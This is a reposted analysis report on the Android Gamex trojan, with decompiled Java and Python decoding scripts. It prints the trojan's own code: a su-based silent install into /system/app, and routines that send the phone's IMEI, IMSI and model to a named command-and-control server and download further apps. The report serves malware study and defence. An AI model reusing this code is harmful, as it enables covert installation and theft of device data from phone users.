Android Gamex Trojan Analysis Report

Source: Internet
Author: User
Tags: java, decompiler

This Gamex Trojan sample was obtained in May. It is not destructive, but it is a good case study for security analysts.

Today I will share the complete analysis process for this sample.
Tools

ApkTool, dex2jar, and DJ Java Decompiler
Python 2.6, for writing the decryption scripts

Analysis
This sample is a repackaged copy of the SD-Booster app. When the infected SD-Booster is installed and run, the trojan silently installs itself into the Android system. To locate the injected code quickly, download the clean SD-Booster, decompile both and compare. The result is shown in Figure 1:


Figure 1
The program has been implanted with the packages "com.android.md5" and "com.gamex.inset". First, find where the implant is loaded: the onCreate() method of the class contains the following inserted code:

    public void onCreate(Bundle paramBundle)
    {
        super.onCreate(paramBundle);
        A.B(this);
        ...
    }
A is a class in the "com.gamex.inset" package. Its B() method is:

    public static void B(Context paramContext)
    {
        context = paramContext;
        Intent localIntent = new Intent(paramContext, Settings.class);
        ComponentName localComponentName = paramContext.startService(localIntent);
    }
It simply starts the Settings.class service. The service's startup code is:

    public void onStart(Intent paramIntent, int paramInt)
    {
        super.onStart(paramIntent, paramInt);
        new Settings$1(this).start();
    }
    class Settings$1 extends Thread
    {
        public void run()
        {
            if ((!A.a) && (A.c()) && (A.d(A.context)))
            {
                A.a = 1;
                Settings localSettings = this.this$0;
                new C(localSettings).start();
            }
            while (true)   // decompiler artifact: this is effectively the else branch
            {
                return;
                this.this$0.stopSelf();
            }
        }
    }

A.a is initialised to 0 and records whether the trojan is already running. A.c() is a single line that checks whether the SD card is ready for the later payload downloads. A.d() checks whether the trojan package "com.android.setting" is already installed. When these conditions are satisfied, the C thread is started to install the trojan; otherwise the service stops itself. dex2jar could not render the run() method of class C, but DJ Java Decompiler shows the complete decompiled code. The thread reads the trojan payload with context.getAssets().open("logos.png") and decrypts it to obtain the final APK installation file. The decryption, reimplemented in Python:

    # -*- coding: utf-8 -*-
    import sys

    def main(filename):
        # XOR every byte of the asset with 0x12 and write the result as an .apk
        infile = open(filename, "rb")
        outfile = open(filename[:-4] + ".apk", "wb")
        while 1:
            c = infile.read(1)
            if not c:
                break
            c = chr(ord(c) ^ 18)
            outfile.write(c)
        outfile.close()
        infile.close()

    if __name__ == '__main__':
        main(sys.argv[1])

The whole file is simply XORed with 0x12. Running "python decrypt_apk.py logos.png" produces the logos.apk trojan file. Once decryption finishes, the a(String) method is called to install the trojan:

    protected static void a(String paramString)
    {
        try
        {
            Process localProcess = Runtime.getRuntime().exec("su");
            OutputStream localOutputStream = localProcess.getOutputStream();
            DataOutputStream localDataOutputStream = new DataOutputStream(localOutputStream);
            localDataOutputStream.writeBytes("mount -o remount rw /system\n");
            String str = "cp -i " + paramString + " /system/app/ComAndroidSetting.apk\n";
            localDataOutputStream.writeBytes(str);
            Thread.sleep(20000L);
            localDataOutputStream.writeBytes("chmod 644 /system/app/ComAndroidSetting.apk\n");
            localDataOutputStream.writeBytes("exit\n");
            localDataOutputStream.flush();
            int i = localProcess.waitFor();
            return;
        }
        catch (IOException localIOException)
        {
            localIOException.printStackTrace();
        }
        catch (InterruptedException localInterruptedException)
        {
            localInterruptedException.printStackTrace();
        }
    }

The whole APK is copied into "/system/app/", which makes it a system app! After installation, the following code sends a broadcast and stops the Settings service:

    Intent intent = new Intent("kurhjfngjhfjghdfjgjjdh");
    context.sendBroadcast(intent);
    Intent intent1 = new Intent(context, com.android.md5.Settings.class);
    boolean flag3 = ...   // the rest of this statement is truncated in the source

Unpacking the trojan APK with dex2jar and viewing AndroidManifest.xml shows that the trojan has no user interface and is driven by two boot broadcast receivers, as shown in Figure 2. This also confirms what we saw in SD-Booster: it broadcasts that strange string. The first broadcast receiver:

    public class B extends BroadcastReceiver
    {
        public static final String q = "android.intent.action.BOOT_COMPLETED";
        public static final String qx = "kurhjfngjhfjghdfjgjjdh";

        public void onReceive(Context paramContext, Intent paramIntent)
        {
            if ((paramIntent.getAction().equals("android.intent.action.BOOT_COMPLETED"))
                || (paramIntent.getAction().equals("kurhjfngjhfjghdfjgjjdh")))
                A.B(paramContext);
        }
    }

A.B() starts the Settings.class service, which in turn starts a thread. Its run() method follows the same pattern as the thread analysed above:

    public void run()
    {
        try
        {
            this.this$0.d();
            sleep(30000L);
            if ((!A.a) && (A.c()) && (A.d(this.this$0)))
            {
                A.a = 1;
                Settings localSettings1 = this.this$0;
                new E(localSettings1).start();
                return;
            }
        }
        catch (InterruptedException localInterruptedException)
        {
            ...
        }
    }

d() decodes the address of the C&C (Command & Control) server and sends the phone's private information to it.
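As an added example (not code from the article or from the trojan), the single-byte XOR masking used on the "logos.png" asset can be recovered from the payload's own structure: the hidden file is an APK, so the plaintext must begin with the ZIP header "PK\x03\x04". The sample asset below is constructed here with the key 0x12 the article reports; the function names are my own.

```python
# Added example: recover a single-byte XOR key from a masked APK asset without
# knowing it in advance. An APK is a ZIP file, so the real content must start
# with "PK\x03\x04"; the sample asset is constructed here using the key 0x12
# that the article reports for the Gamex "logos.png" asset.

ZIP_MAGIC = b"PK\x03\x04"


def xor_bytes(data, key):
    """XOR every byte with a single-byte key (the operation is self-inverse)."""
    return bytes(b ^ key for b in data)


def recover_xor_key(blob):
    """Return the single-byte key k for which blob XOR k starts with a ZIP header,
    or None if no key works (then the asset is probably not a XOR-masked APK)."""
    head = blob[:len(ZIP_MAGIC)]
    for k in range(256):
        if xor_bytes(head, k) == ZIP_MAGIC:
            return k
    return None


def decrypt_asset(blob):
    """Recover the key and return (key, plaintext); raise if it is not a masked ZIP."""
    key = recover_xor_key(blob)
    if key is None:
        raise ValueError("no single-byte XOR key yields a ZIP header")
    return key, xor_bytes(blob, key)


# Constructed stand-in for the "logos.png" asset: a fake APK header masked with 0x12.
FAKE_APK = ZIP_MAGIC + b"\x14\x00\x00\x00\x08\x00AndroidManifest.xml"
SAMPLE_LOGOS_PNG = xor_bytes(FAKE_APK, 0x12)

if __name__ == "__main__":
    key, plain = decrypt_asset(SAMPLE_LOGOS_PNG)
    print("key = 0x%02x, plaintext starts with %r" % (key, plain[:4]))
```

A real PNG asset starts with "\x89PNG", so the check also tells an untouched image apart from a masked payload.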
The decoding is done in the getUrl() method of Settings; here it is reimplemented in Python:

    # -*- coding: UTF-8 -*-
    import sys

    def decrypt2url(decryptedfile):
        f = open(decryptedfile, "r")
        buf = f.read()
        bs = map(ord, buf)                 # hold the byte stream as a list of integers
        sizz = len(bs)
        for i in range(0, sizz, 2):        # swap bytes from the front with their mirror at the back
            if i >= sizz / 2:
                break
            d = bs[i]
            bs[i] = bs[sizz - 1 - i]
            bs[sizz - 1 - i] = d
        ss = ''.join(map(chr, bs))
        bs2 = ss.split(',')                # the fields are comma separated
        bss = list(bs2)
        sout = ''
        for i in range(0, len(bss), 2):    # every other field is an ASCII code
            sout = sout + chr(int(bss[i]))
        print sout

    def main(filename):
        PASS = ''.join(chr(x) for x in [9, 5, 9, 8, 5])   # the repeating XOR key
        infile = open(filename, "rb")
        outfile = open(filename[:-4] + ".txt", "wb")
        i = 0
        while 1:
            c = infile.read(1)
            if not c:
                break
            j = i % 5
            d = PASS[j]
            c = chr(ord(c) ^ ord(d))
            i = i + 1
            outfile.write(c)
        outfile.close()
        infile.close()
        decrypt2url(filename[:-4] + ".txt")

    if __name__ == '__main__':
        main(sys.argv[1])
Here every byte of the "logo.png" file is XORed with the repeating key [9, 5, 9, 8, 5], giving the content shown in Figure 3:

Figure 3
Once this string is obtained, its bytes are swapped end for end as shown in the script, the result is split on commas, each number is an ASCII code, and the final URL is assembled from the numbers at the even positions. For readers who prefer Java, a Java implementation of the decoder is included in the attachment. The decrypted result is shown in Figure 4:
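As an added example (not the article's script and not the trojan's own code), the same decoding in Python 3, together with an encoder so that a test input can be constructed here rather than taken from the sample: the key [9, 5, 9, 8, 5], the end-for-end swap and the every-other-comma-field rule are the article's; the URL and the function names are placeholders of mine.

```python
# Added example: the C&C-address encoding as the article describes it, with an
# encoder (my addition) used only to build a constructed test input.

KEY = bytes([9, 5, 9, 8, 5])   # repeating XOR key from the article


def xor_with_key(data):
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ KEY[i % len(KEY)] for i, b in enumerate(data))


def swap_ends(data):
    """Swap byte i with byte n-1-i for even i in the first half, as the script does.
    Each pair is swapped exactly once, so the operation is its own inverse."""
    bs = bytearray(data)
    n = len(bs)
    for i in range(0, n, 2):
        if i >= n / 2:
            break
        bs[i], bs[n - 1 - i] = bs[n - 1 - i], bs[i]
    return bytes(bs)


def decode_url(blob):
    """The article's decoding: XOR, swap ends, split on commas, keep the even fields."""
    text = swap_ends(xor_with_key(blob)).decode("ascii")
    fields = text.split(",")
    return "".join(chr(int(fields[i])) for i in range(0, len(fields), 2))


def encode_url(url, filler="0"):
    """Inverse of decode_url; the odd comma fields are padding the decoder ignores."""
    text = ",".join(str(ord(ch)) + "," + filler for ch in url)
    return xor_with_key(swap_ends(text.encode("ascii")))


# Constructed placeholder address, not the address reported in the article.
SAMPLE_URL = "http://cnc.example.invalid/"
SAMPLE_ICON_PNG = encode_url(SAMPLE_URL)

if __name__ == "__main__":
    print(decode_url(SAMPLE_ICON_PNG))
```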


Accessing this URL directly is refused (Forbidden). In the d() method, getDeviceId(), getSubscriberId(), Build.MODEL and the "CMP_PID" string from getApplicationInfo(str3, 128).metaData are combined with the decoded address into the final network address "http://www.fineandroid.com/inputex/index.php?s=/Interface/keinter/a1/DeviceId/a2/SubscriberId/a3/MODEL/index/xian1234", and B(String) is then called to start a thread that sends the information. The code:

    public void run()
    {
        ...
        HttpGet localHttpGet = new HttpGet(str);
        try
        {
            HttpResponse localHttpResponse = new DefaultHttpClient().execute(localHttpGet);
            if ((localHttpResponse.getStatusLine().getStatusCode() == 200)
                && (EntityUtils.toString(localHttpResponse.getEntity()).equals("1")))
            {
                SharedPreferences.Editor localEditor1 = this.this$0.getSharedPreferences("tijiao", 0).edit();
                SharedPreferences.Editor localEditor2 = localEditor1.putInt("biaoji", 1);
                boolean bool = localEditor1.commit();
            }
            return;
        }
        catch (ClientProtocolException localClientProtocolException)
        {
            ...
        }
        ...
    }

If the submission succeeds, a flag is saved in SharedPreferences. We constructed such a URL and requested it manually; the response is shown in Figure 5. Now back to the Settings$1 thread. After the work above it re-checks A.a (is the trojan running), A.c() (is the SD card ready) and A.d(Context) (is the "com.android.update" trojan installed). If the conditions are met, an E thread is started. The E thread first registers two broadcast receivers for "android.intent.action.PACKAGE_ADDED" and "android.intent.action.PACKAGE_CHANGED"; on receiving the Intent("akjgikurhnfjghfkj") broadcast, the Settings.class service is started. The thread then decodes the "com.android.update" trojan in exactly the same way as "com.android.setting": the earlier "decrypt_apk.py" script decrypts the trojan APK, and the a() method installs "com.android.update".
That covers the trojan installation and information upload triggered by the B boot broadcast receiver. The other boot receiver, class D, is very simple: on receiving the broadcast it obtains the trojan's package name and calls "pm install -r" in the a() method to reinstall the trojan. This completes the analysis of the "com.android.setting" trojan. Now let's look at "com.android.update", which is the core of Gamex.
Source: this site. Reposted by: Non-insect. Date: 2013-07-31.

The "com.android.update" trojan core is started by the boot broadcast, as shown in Figure 6. The broadcast receiver code is:

    public class B extends BroadcastReceiver
    {
        public static final String a = "akjgikurhnfjghfkj";
        public static final String q = "android.intent.action.BOOT_COMPLETED";

        public void onReceive(Context paramContext, Intent paramIntent)
        {
            if ((paramIntent.getAction().equals("android.intent.action.BOOT_COMPLETED"))
                || (paramIntent.getAction().equals("akjgikurhnfjghfkj")))
                A.boot(paramContext);
        }
    }

On receiving the broadcast, the A.boot() method starts the Updater.class service. This service creates four worker objects that do all of the trojan's work:

    public void onStart(Intent paramIntent, int paramInt)
    {
        super.onStart(paramIntent, paramInt);
        D localD = new D(this);
        this.activityThread = localD;
        F localF = new F(this);
        this.getSoftThread = localF;
        G localG = new G(this);
        this.downSoftThread = localG;
        H localH = new H(this);
        this.installSoftThread = localH;
    }

The four objects have a clear division of labour; let's go through them one by one. The first, D, is the "lookout": during construction it registers a broadcast receiver D$1 for "android.intent.action.SCREEN_OFF" and "android.intent.action.SCREEN_ON". When the screen turns on, it launches HOME to hide itself; when the screen turns off, it quietly works through the software installed by the user, as follows. D$1 first calls the d() method of D's member M (the database access object, created when D is initialised) to query trojan apps that are installed but not running, then calls D.f() to get the list of running software and compares it with the list returned by M.d().
For each program found not running, localPackageManager.getLaunchIntentForPackage(String) obtains its launch intent, paramContext.startActivity(localIntent1) launches it, M.j(String) updates the running-status database, and finally D.n(String) reports to the C&C server:

    public void n(String paramString)
    {
        String str1 = ((TelephonyManager) this.g.getSystemService("phone")).getDeviceId();   // obtain the IMEI
        if (str1 == null)
            str1 = "";
        String str2 = String.valueOf(j());
        String str3 = String.valueOf(str2 + "inputex/index.php?s=/Interface/neiinter/a1/");
        String str4 = str3 + str1 + "/nam/" + paramString;
        j(str4);
    }

j() decrypts the "icon.png" file in the assets directory to obtain the C&C address; decrypt_url.py can decrypt it as well. The decrypted address is again "http://www.fineandroid.com/". The URL is assembled and j(String) sends it, exactly as in "com.android.setting". That covers the D object; next is F. F is also very simple: it fetches the list of trojans from the trojan server and writes it to the local database for later lookup. The address obtained by F.k() is "http://fineandroid.com/InstallApk/php4sam.php"; accessing it directly gives Figure 7:

Figure 7

The trojan's author prepared these for Chinese users. Are any of them really trojans? The whole HTML page is parsed by J.a(InputStream); the content is omitted here for space. The resulting list is inserted into the database via M.g(String, ...), and F.e(String) applies a simple encryption that I will not analyse. Now the third class, G, which is responsible for downloading trojans. Its core method is loop(). It first calls M.c() to look for trojan software that has not yet been downloaded; if there is some, it checks whether the phone is on WIFI. If the conditions are met, a new P object is created, which calls K.d(String, ...) to start the download, and M.h() then records the trojan's download status. When the work is done the thread sleeps: 1 minute on WIFI, 5 hours otherwise. The code (decompiler output, lightly tidied):

    protected void loop()
    {
        NetworkInfo localNetworkInfo = ((ConnectivityManager) this.e.getSystemService("connectivity")).getActiveNetworkInfo();
        List localList;
        if ((localNetworkInfo != null) && (localNetworkInfo.isAvailable()) && (!this.d))
        {
            localList = this.h.c();
            if (localList.size() == 0)
                setSleepTime(60000L);   // nothing to download: rest for 1 minute
        }
        while (true)
        {
            return;
            if (localNetworkInfo.getTypeName().equals("WIFI"))   // on WIFI?
            {
                localIterator = localList.iterator();
                if (!localIterator.hasNext())
                    continue;
                ...
                Handler localHandler1 = this.f;
                new P(localContext1, str1, str2, "download/", str3, localHandler1).start();   // start the download
                this.d = 1;
                setSleepTime(60000L);   // after the download, rest 1 minute and continue
            }
            ...
            new P(localContext2, str4, str5, "download/", str6, localHandler2).start();   // start the download
            this.d = 1;
            setSleepTime(18000000L);   // rest for 5 hours
            ...
        }
    }

The last class, H, is the installer. It does no substantive work itself; at intervals it broadcasts the status of the downloaded trojan software to the database. That completes the analysis of Gamex. Looking at the whole, Gamex is built from a lot of code that is routine in an Android programmer's daily work: code bundling, silent installation, URL submission and response handling, boot broadcasts, and file encryption and decryption. Only with a solid grasp of Android fundamentals and careful program analysis can Android trojans be seen through. Finally, a Gamex flowchart to aid understanding.
